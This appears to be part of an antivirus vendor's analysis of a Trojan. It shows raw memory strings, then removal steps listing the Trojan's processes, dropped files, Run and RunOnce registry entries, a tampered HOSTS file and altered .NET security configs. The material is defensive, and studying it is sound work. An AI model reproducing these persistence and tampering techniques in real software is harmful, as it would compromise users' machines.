WS_ExecuteQuery
Shdocvw_BaseBrowser_FireEvent_WindowStateChanged
IdleTask_Execution_Time
9.00.8112.16421 (WIN7_IE9_RTM.110308-0330)
IEXPLORE.EXE
Windows
9.00.8112.16421

UBWBZWLKRG.exe_948_rwx_0013C000_00004000:

%Fkj^
%Dkj^
u.kj^
-.kj^

UBWBZWLKRG.exe_948_rwx_003B0000_00010000:

2.lj3
.iDjj


Remove it with Ad-Aware

  1. Click (here) to download and install Ad-Aware Free Antivirus.
  2. Update the definition files.
  3. Run a full scan of your computer.


Manual removal*

  1. Terminate malicious process(es) (How to End a Process With the Task Manager):

    c4fa995d7ed1670ba8f720242f87dde6.tmp:3404
    dw.exe:3584
    DOCPSADOPK.exe:3808
    %original file name%.exe:1796

  2. Delete the original Trojan file.
  3. Delete or disinfect the following files created/modified by the Trojan:

    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\dw.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\itdownload.dll (1489 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-MQUT5.tmp\_isetup\_shfoldr.dll (47 bytes)
    C:\Windows\System32\drivers\etc\hosts (1 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe (243 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe (233 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.exe.config (1 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.cfg (88 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\OPLKIDMWLL.cfg (88 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe.config (1 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe (833 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\enterprisesec.config.cch.new (844 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe.config (1 bytes)
    C:\Windows\Microsoft.NET\Framework\v2.0.50727\CONFIG\security.config.cch.new (844 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.cfg (88 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.cfg (88 bytes)
    %Program Files%\Mozilla Firefox\UDKKVOSOVF\CHXOCZMVSI.exe.config (1 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Roaming\Microsoft\CLR Security Config\v2.0.50727.312\security.config.cch.new (872 bytes)
    C:\Users\"%CurrentUserName%"\AppData\Local\Temp\is-UDAF0.tmp\c4fa995d7ed1670ba8f720242f87dde6.tmp (1622 bytes)

  4. Delete the following value(s) in the autorun key (How to Work with System Registry):

    [HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce]
    "DOCPSADOPK.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\DOCPSADOPK.exe"

    [HKCU\Software\Microsoft\Windows\CurrentVersion\Run]
    "UBWBZWLKRG.exe" = "%Program Files%\Mozilla Firefox\UDKKVOSOVF\UBWBZWLKRG.exe"

  5. Restore the original content of the HOSTS file (%System%\drivers\etc\hosts):
    127.0.0.1 localhost
  6. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.
